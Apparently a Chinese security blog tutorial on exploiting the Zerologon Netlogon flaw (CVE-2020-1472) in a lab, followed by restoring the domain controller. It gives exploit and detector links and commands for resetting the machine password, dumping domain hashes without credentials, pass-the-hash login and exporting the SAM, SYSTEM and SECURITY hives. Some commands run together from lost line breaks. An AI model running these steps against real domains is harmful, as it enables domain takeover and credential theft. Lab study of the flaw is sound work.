Netlogon域控提权(CVE-2020-1472)

  • A+
所属分类:安全文章



原理及利用步骤





https://www.preempt.com/blog/security-advisory-zerologon-cve-2020-1472-an-unauthenticated-privilege-escalation-to-full-domain-privileges/ 


https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hijacking-a-domain-controller-with-netlogon-rpc-aka-zerologon-cve-2020-1472/ 




影响版本:





Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)Windows Server 2012Windows Server 2012 (Server Core installation)Windows Server 2012 R2Windows Server 2012 R2 (Server Core installation)Windows Server 2016Windows Server 2016 (Server Core installation)Windows Server 2019Windows Server 2019 (Server Core installation)Windows Server, version 1903 (Server Core installation)Windows Server, version 1909 (Server Core installation)Windows Server, version 2004 (Server Core installation)





环境描述:




域控: Windows Server 2008 R2 Standard

攻击机:kali-linux-2020.1  (不在域内,能连通域控



漏洞检测:




POC地址:

https://github.com/SecuraBV/CVE-2020-1472


查询netbios名称:

linux:

nbtscan -v -h 192.168.1.56   


Workstation Service选项的值

windows:

nbtstat -A  192.168.1.56


检测:

python3 zerologon_tester.py  dc-netbios-name  dc-ip


Netlogon域控提权(CVE-2020-1472)




漏洞利用:




exp地址:

https://github.com/dirkjanm/CVE-2020-1472


python3 cve-2020-1472-exploit.py 

坑点报错:

Unexpected  error:module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2'.


解决:需要卸载现有impacket套件,安装最新的impacket

卸载:

sudo apt remove --purge impacket-scripts python3-impacketsudo apt autoremove


安装:

git clone https://github.com/SecureAuthCorp/impacketcd  impacketsudo pip isntall .sudo python3 setup.py install


Netlogon域控提权(CVE-2020-1472)


密码置空,使用secretdump获取域控上的hash(这里置空的是域控所在机器的机器管理员密码,而非域控密码--->域控所在机器密码跟更改可能会影响与其他域的通信或者域控上的dns等功能)

./secretsdump.py  域名称/域控机器名称[email protected]域控IP  -just-dc  -no-pass 

Netlogon域控提权(CVE-2020-1472)




环境恢复:




[方法1]

如上图,已获取域控Administrator的hash,使用该hash尝试获取机器hash即MACHINE.ACC中的

hash,plain_password_hex选项的值

./secretsdump.py  pentest/[email protected]168.1.56   -hashes  aad3b435b51404eeaad3b435b51404ee:4cb55ea6471d29ccbb2ce4cf00271fe3     -use-vss


Netlogon域控提权(CVE-2020-1472)


恢复hashes

python3 restorepassword.py /@ -target-ip-hexpass


Netlogon域控提权(CVE-2020-1472)


secretdump验证:

Netlogon域控提权(CVE-2020-1472)


[方法2]

有些情况不能获取到plain_password_hex,通过已获取的域控hash登录机器并dump sam文件到本地

./wmiexec.py pentest/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:4cb55ea6471d29ccbb2ce4cf00271fe3


导出并下载sam : 

reg save HKLMSYSTEM system.savereg save HKLMSAM sam.savereg save HKLMSECURITY security.saveget system.saveget sam.saveget security.save




解析sam提取机器密码hex

./secretsdump.py -sam sam.save -system system.save -security security.save LOCAL


 

Netlogon域控提权(CVE-2020-1472)


删除机器上的sam:

del /f system.savedel /f sam.savedel /f security.save



[方法3]

通过域管hash登录,执行下面命令重置机器密码

powershell Reset-ComputerMachinePassword


Netlogon域控提权(CVE-2020-1472)




链接:




https://meterpreter.org/cve-2020-1472-netlogon-privilege-escalation-vulnerability-alert/ 


https://my.oschina.net/u/4587690/blog/4662834 


https://github.com/dirkjanm/CVE-2020-1472 


https://github.com/mstxq17/cve-2020-1472 


end




Netlogon域控提权(CVE-2020-1472)

           

            Netlogon域控提权(CVE-2020-1472)





                                                                                                           我就知道你“在看”

Netlogon域控提权(CVE-2020-1472)



本文始发于微信公众号(雷石安全实验室):Netlogon域控提权(CVE-2020-1472)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: